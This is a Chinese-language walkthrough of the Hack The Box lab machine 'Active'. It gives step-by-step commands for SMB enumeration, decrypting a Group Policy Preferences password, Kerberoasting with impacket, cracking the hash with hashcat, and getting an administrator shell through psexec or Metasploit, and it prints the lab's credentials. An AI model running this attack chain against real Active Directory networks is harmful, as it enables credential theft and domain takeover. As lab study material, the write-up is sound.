這次的靶機是Hackthebox的Active

靶機IP地址:10.10.10.100

=================================================================

信息收集

nmap -sV -sT 10.10.10.100

Kerberos在88，netbios-ssn在139，ldap在389和3268。

SMB枚舉

由于目標(biāo)機器在139端口上開放了netbios-ssn，我們用smbmao掃描下看看能得到什么有用的信息

smbmap -H 10.10.10.100

這里我們發(fā)現(xiàn)只有Replication 允許讀

我們用smbclient來訪問下

之后，我們訪問共享我們會發(fā)現(xiàn)一個名為Groups.xml

在\active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\

通過下載查看文件，我們將找到用戶名和加密密碼。

解密GPP

剛剛哪個加密的密碼cpassword就是組策略密碼GPP

我們利用gpp-decrypt來進(jìn)行解密

我們得到了密碼GPPstillStandingStrong2k18

現(xiàn)在我們有憑證SVC_TGS：GPPstillStandingStrong2k18我們可以擁有用戶賬號

smbclient //10.10.10.100/Users -U SVC_TGS

Kerberoasting

現(xiàn)在，如果我們返回到我們的nmap掃描。

我們將看到我們在端口88上運行了kerberos，我們現(xiàn)在擁有一個用戶，所以我們將去kerberoasting

如果你不知道什么是kerberoasting技術(shù)，你可以閱讀這3篇文章

第1部分

第2部分

第3部分

首先，我們將10.10.10.100添加到/ etc / hosts中

我們從Github下載并安裝impacket以使用其python類GetUserSPN.py

github地址；https://github.com/SecureAuthCorp/impacket

這里的話我kali我里面會報出這個錯誤

不知道怎么解決，希望有會的人麻煩評論下。

然后我換了到win下進(jìn)行操作

也是一樣的 需要吧

10.10.10.100 active.htb 添加到HOSTS中去。

然后執(zhí)行命令

python GetUserSPNs.py -request -dc-ip 10.10.10.100 active.htb/SVC_TGS:GPPstillStandingStrong2k18

我們把其中的hash復(fù)制到hash.txt進(jìn)行破解

然后在hashcat的幫助下我們找到了哈希模式，結(jié)果它顯示了13100 for Kerberos 5 TGS-REP etype 23

hashcat -h |grep -i tgs

最后，是時候破解哈希并使用rockyou.txt wordlist獲取密碼。

hashcat -m 13100 hash.txt -a 0 /usr/share/wordlists/rockyou.txt --force ---show

然后我們得到了管理員密碼：Ticketmaster1968

下面介紹2種方法拿root shell

①還是用impact/example里面的psexec.py來獲取root shell

python psexec.py administrator@active.htb

②用metaploit框架并運行以下模塊來生成完整的權(quán)限系統(tǒng)shell

msf > use exploit/windows/smb/psexec

msf exploit windows/smb/psexec) > set rhost 10.10.10.100

msf exploit(windows/smb/psexec) > set smbuser administrator

msf exploit(windows/smb/psexec) > set smbpass Ticketmaster1968

msf exploit(windows/smb/psexec) > exploit

最后分享一下這個導(dǎo)圖，大家對hack the box 平臺有一個完整清晰地了解~